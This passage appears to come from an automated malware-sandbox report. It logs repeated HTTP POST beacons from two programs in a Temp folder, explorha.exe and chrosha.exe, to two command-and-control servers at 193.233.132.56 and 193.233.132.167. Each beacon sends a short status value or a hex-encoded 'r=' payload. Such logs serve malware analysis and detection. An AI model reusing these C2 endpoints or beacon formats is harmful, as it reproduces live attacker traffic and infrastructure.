                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.037081003 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      956192.168.2.550807193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.155663967 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.407547951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      957192.168.2.550808193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.399734020 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.645073891 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      958192.168.2.550809193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.661086082 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.914602995 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      959192.168.2.550810193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:22.893455982 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.141645908 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      960192.168.2.550811193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.273309946 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.516922951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      961192.168.2.550812193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.487164974 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.728092909 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      962192.168.2.550813193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.775243044 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.027697086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      963192.168.2.550814193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:23.991250038 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.246453047 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      964192.168.2.550815193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.379095078 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.619643927 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      965192.168.2.550816193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.612878084 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.861007929 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      966192.168.2.550817193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:24.875261068 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.127940893 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      967192.168.2.550818193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.119321108 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.375372887 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      968192.168.2.550819193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.495364904 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.743014097 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      969192.168.2.550821193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.743024111 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.990389109 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      970192.168.2.550822193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:25.994538069 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.246619940 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      971192.168.2.550823193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.347805977 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.591861963 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


